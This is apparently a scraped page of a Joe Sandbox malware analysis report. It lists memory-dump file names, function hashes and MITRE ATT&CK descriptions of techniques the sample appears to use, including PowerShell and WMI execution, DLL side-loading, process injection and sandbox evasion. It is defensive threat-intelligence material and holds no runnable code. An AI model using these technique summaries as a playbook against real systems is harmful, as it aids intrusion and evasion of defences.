Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd102701b9713e2ac99274bce7eab0b2be1c5f99cee5e22e81e866598d8d769d
Instruction ID: 5239aab36c097f93f81cc1bf678d444a517ecacf0a0bec989c38d1b4e3b64be3
Opcode Fuzzy Hash: cd102701b9713e2ac99274bce7eab0b2be1c5f99cee5e22e81e866598d8d769d
Instruction Fuzzy Hash: A3316773A0D220EBD3046D199C7567FB6DAEB883A0F23042FE586D7700DB78584292DB

Function 00246D10 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b1d4fea779c8f0d77c7039aa4f1f1c1a5250a352aef12596e5d40a01a17643
Instruction ID: 1399ce57d1994f297f726769002fbcaa45ddd6bedbbb79d41cd93641da2a6220
Opcode Fuzzy Hash: 67b1d4fea779c8f0d77c7039aa4f1f1c1a5250a352aef12596e5d40a01a17643
Instruction Fuzzy Hash: C711C13BF356628BE364DE6AECCC5166352FBC6215B1E0535EA81C7242CA62F821D291

Function 002636AC Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5507cf9c2d8b8c14da67ecf4348146d2a1b8fd35c9451396dd382dab63a03143
Instruction ID: 049c93042146f673a23edf5fbc489f7e1a7785396f91ef0e7a44ab7e055bff94
Opcode Fuzzy Hash: 5507cf9c2d8b8c14da67ecf4348146d2a1b8fd35c9451396dd382dab63a03143
Instruction Fuzzy Hash: A021E4B9A15305CFCB068F28E8906AABBF0FB0A314F1848BDE546D7201E372D426CF50

Function 00278C80 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: c28454ee55d3f726d31c5bffc015b1f42c73cf367d6e487a0d8bd8fe3b2698e4
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 7111E533B562D50ED3168D3C9404565BFA30AA3234F59C39EF4BC9B2D2DA328D8A8365

Function 0026E7B0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.2268401414.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268464515.0000000000299000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268480630.000000000029B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268542582.00000000002A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268560367.00000000002A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2268587007.00000000002A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270011469.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270381458.00000000003FE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270660089.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272192016.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272210872.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272235431.0000000000439000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272254145.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272285593.0000000000459000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272311858.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272333201.000000000045F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272354348.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272385298.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272419556.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272443007.000000000048A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272467540.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272501397.000000000048E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272553176.0000000000494000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272586772.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272608276.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272629702.00000000004A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272651656.00000000004A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272670209.00000000004A9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272698338.00000000004AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272720769.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272748173.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272774711.00000000004BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272796191.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272830256.00000000004C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272854601.00000000004C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272879944.00000000004D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272910638.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272932606.00000000004DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272954524.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2272975467.00000000004E6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.00000000004E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273024986.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273095154.0000000000530000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273119190.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273140925.0000000000537000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273199466.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273219109.0000000000548000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccd4263a6600a8e6b338023b0181bc1196df4a3e081a7fe201df2049addf5b40
Instruction ID: 09f5c0b2f17fbc7a51c8e1d1016db62d95238f3723eec23a8d5428645cfe84c4
Opcode Fuzzy Hash: ccd4263a6600a8e6b338023b0181bc1196df4a3e081a7fe201df2049addf5b40
Instruction Fuzzy Hash: 1B01D4F961130247DF25AE5494C4727F2B86F84704F19483CE8048B302FB71EC65CAE1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
